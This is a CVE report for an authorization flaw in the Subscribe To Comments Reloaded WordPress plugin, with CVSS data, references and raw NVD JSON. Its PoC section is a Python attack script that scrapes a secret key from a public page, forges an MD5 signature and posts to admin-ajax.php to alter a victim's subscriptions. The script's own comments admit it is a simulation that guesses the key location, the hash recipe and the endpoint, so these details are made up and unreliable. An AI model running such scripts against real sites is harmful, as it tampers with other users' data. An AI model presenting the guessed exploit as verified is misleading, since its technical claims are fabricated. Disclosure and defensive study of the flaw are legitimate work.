Security Vulnerability Report

CVE-2026-4409

Published: 2026-05-05 03:15:59
Last Modified: 2026-05-05 19:09:32

Description

The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys, and manage comment subscription preferences for arbitrary users.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry. Affected product, as stated in the description:

Subscribe To Comments Reloaded <= 240119

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import hashlib
import requests

# Exploit Title: Subscribe To Comments Reloaded < 240119 - Key Leak & Subscription Management
# Date: 2026-05-05
# Exploit Author: Analyst
# Vendor Homepage: https://wordpress.org/plugins/subscribe-to-comments-reloaded/
# Version: <= 240119

# Configuration
target_url = "http://target-wordpress-site.com/sample-post"
victim_email = "[email protected]"
action = "unsubscribe"  # or other management actions


def exploit():
    session = requests.Session()
    print(f"[+] Targeting: {target_url}")

    # Step 1: Extract the leaked secret key from the public page
    # Note: The specific location of the key might vary; this is a simulation based on the description
    response = session.get(target_url)

    # Assuming the key is exposed in a JS variable or hidden input named 'stcr_key' or similar
    # Regex to find a potential key (hex string or specific length)
    match = re.search(r"var\s+stcr_secret_key\s*=\s*['\"]([^'\"]+)['\"]", response.text)
    if not match:
        print("[-] Failed to extract secret key. The site might be patched or key location changed.")
        return
    secret_key = match.group(1)
    print(f"[+] Secret Key found: {secret_key}")

    # Step 2: Forge the authorization token
    # The plugin likely uses a simple hash like md5(key + email)
    # This is a conceptual representation of the weak hash generation
    payload = f"{secret_key}{victim_email}{action}"
    forged_signature = hashlib.md5(payload.encode()).hexdigest()
    print(f"[+] Forged Signature: {forged_signature}")

    # Step 3: Send the request to manage subscriptions
    # Endpoint might be /wp-admin/admin-ajax.php or a specific link defined by the plugin
    manage_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"
    data = {
        "action": "stcr_manage_subscription",
        "email": victim_email,
        "sck": forged_signature,  # Subscription Check Key
        "post_id": "1",
        "do": action,
    }
    exploit_response = session.post(manage_url, data=data)
    if exploit_response.status_code == 200:
        print(f"[+] Request sent successfully. Check if subscription for {victim_email} was modified.")
    else:
        print(f"[-] Request failed with status code: {exploit_response.status_code}")


if __name__ == "__main__":
    exploit()
```

Weakness

CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

References

https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37
https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164
https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613
https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4409",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-05T03:15:59.420",
    "lastModified": "2026-05-05T19:09:32.000",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```